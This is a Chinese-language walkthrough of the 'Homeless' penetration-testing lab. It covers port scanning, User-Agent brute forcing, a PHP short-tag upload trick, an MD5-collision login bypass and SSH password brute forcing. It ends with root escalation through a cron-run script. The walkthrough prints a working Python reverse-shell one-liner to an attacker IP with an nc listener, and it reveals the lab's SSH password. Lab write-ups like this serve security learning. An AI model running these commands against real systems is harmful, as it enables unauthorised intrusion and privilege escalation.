Homeless靶场渗透笔记

admin 2020年12月21日10:37:10评论99 views字数 2431阅读8分6秒阅读模式

## 加载开启镜像,开整


Homeless靶场渗透笔记


查看本机的IP地址段,然后进行扫描发现主机

Homeless靶场渗透笔记

root@kali:~# nmap -p-  -A -O 192.168.195.134

扫描发现开放两个端口2280,访问80发现是个demo,在网页中寻找信息

Homeless靶场渗透笔记

Homeless靶场渗透笔记




查看源代码未发现有效的信息,查看爬虫文件


Homeless靶场渗透笔记

Homeless靶场渗透笔记

先扫一波再说

使用工具 - dirsearch

https://github.com/maurosoria/dirsearch


Homeless靶场渗透笔记

并没有什么有用的信息,发现ua会原封不动的展示在回显,想到之前出题人提示rockyou,可能用字典爆破ua会有收获

Homeless靶场渗透笔记

Homeless靶场渗透笔记


## 操作一:爆破


进入/usr/share/wordlists/路径下kali自带的密码字典rockyou.txt.gz

进行解压:

gzip -d rockyou.txt.gz


Homeless靶场渗透笔记

只要ua里包括cyberdog就可以得到提示页面.


## 操作二:脑洞大开出奇迹


还有一种操作时发现网页隐藏了一个图片,打开后将标题输入ua就可得到提示! 要我估计把头挠秃了也想不出来


Homeless靶场渗透笔记

Homeless靶场渗透笔记


打开是个上传页面

Homeless靶场渗透笔记

经过上传测试发现,可以上传任何文件,但是文件内容不能超过8个字符。

Homeless靶场渗透笔记

Homeless靶场渗透笔记

## 此时可以用到php代码格式的小技巧

### 1. php代码格式

PHP代码有下列几种格式,在此推荐使用第一种格式。1、标准格式,以 <?php 开头,以 ?> 结束。例如:<?phpecho"welcome!";?>
2、短标签,以 <? 开头,以 ?> 结束。例如:<?print "Thisis a PHP example.";?>注:短标签的启用必须启用php.ini中的配置项short_open_tag。使用短标签输出一段文字的话,还可以使用下列简介方式:<?="This is a PHP example."; ?>
3、脚本。例如:<script language="php">print "Thisis a PHP example.";

相当于



<?php echo "This is a PHP example."; ?>


### 2. php执行运算符


链接:php执行运算符

经过测试,可以执行命令,但是仅局限于<=2个字符的命令,如lsps,发现下一步提示


Homeless靶场渗透笔记

Homeless靶场渗透笔记

发现新文件,访问测试

Homeless靶场渗透笔记


Homeless靶场渗透笔记

扫描发现备份文件

Homeless靶场渗透笔记

值必须相等

Homeless靶场渗透笔记

Homeless靶场渗透笔记

Homeless靶场渗透笔记

有个python工具可以生成NMD5相同的文件,但是此工具仅可以在*unix上进行运行。

https://github.com/thereal1024/python-md5-collision


git clone https://github.com/thereal1024/python-md5-collision.git另外需要安装依赖才能正确运行,需要root权限和python2/3 程序apt-get update

Homeless靶场渗透笔记

Homeless靶场渗透笔记


### Curl用法之--data-urlencode



5) --data-urlencode key=value
--data-urlencode参数等同于-d,发送 POST 请求的数据体,区别在于会自动将发送的数据进行 URL编码。先对数据进行URL编码,再发送给HTTP服务器,即对表单中的字段值进行URL编码后再发送。为了兼容CGI,格式为“name+分隔符+content”,如下所示:
name=content,将content进行URL编码,然后提交给HTTP服务器=content,同上,只是未给出引用的name content,同上,注意content中不能包含=和@符号name@filename,从文件filename中读取数据(包括换行符),将读取的数据进行URL编码,然后提交给HTTP服务器@filename,同上
root@kali:/home/tools/python-md5-collision#curl--data-urlencode username@out_test_000.txt--data-urlencodepassword@out_test_001.txt--data-urlencode code@out_test_002.txt--data-urlencode"remember=1&login=Login"http://192.168.195.134/d5fa314e8577e3a7b8534a014b4dcb221de823ad/index.php-i -i参数打印出服务器回应的HTTP标头。

Homeless靶场渗透笔记


返回的请求头中有Session值,需要修改cookie进入admin.php ,第二天了IP变了

Homeless靶场渗透笔记

Homeless靶场渗透笔记

Homeless靶场渗透笔记

Homeless靶场渗透笔记




使用python进行反弹shell 网站执行

python-c"import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.195.128',8888));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

Homeless靶场渗透笔记

攻击机执行:

nc -lvp 8888

Homeless靶场渗透笔记

Getshell进行信息搜集。发现 /home/downfall 用户目录下存在todo文件,查看该目录的其他文件发现隐藏文件,但没有权限。可以对此用户进行爆破,然后查看文件

Homeless靶场渗透笔记

靶场提示里有线索,以sec开头创造字典,前期信息搜集其ssh端口为22,进行爆破。


Homeless靶场渗透笔记


爆破成功得到密码 secretlyinlove 

Homeless靶场渗透笔记

登录进行信息搜集,得到提示需要取得 root 权限。

Homeless靶场渗透笔记

Homeless靶场渗透笔记


Homeless靶场渗透笔记

Homeless靶场渗透笔记

经过分析发现,文件/lib/logs/homeless.py所有者为 downfall,但是邮件里提到root用户会每隔一段时间运行此脚本。思路就是以downfall用户修改/lib/logs/homeless.py文件,饭后root用户会运行修改后的文件,以此反弹shell得到提升root权限。

Homeless靶场渗透笔记

Homeless靶场渗透笔记


GetShell !

Homeless靶场渗透笔记


本文始发于微信公众号(重生信息安全):Homeless靶场渗透笔记

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2020年12月21日10:37:10
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Homeless靶场渗透笔记http://cn-sec.com/archives/208172.html

发表评论

匿名网友 填写信息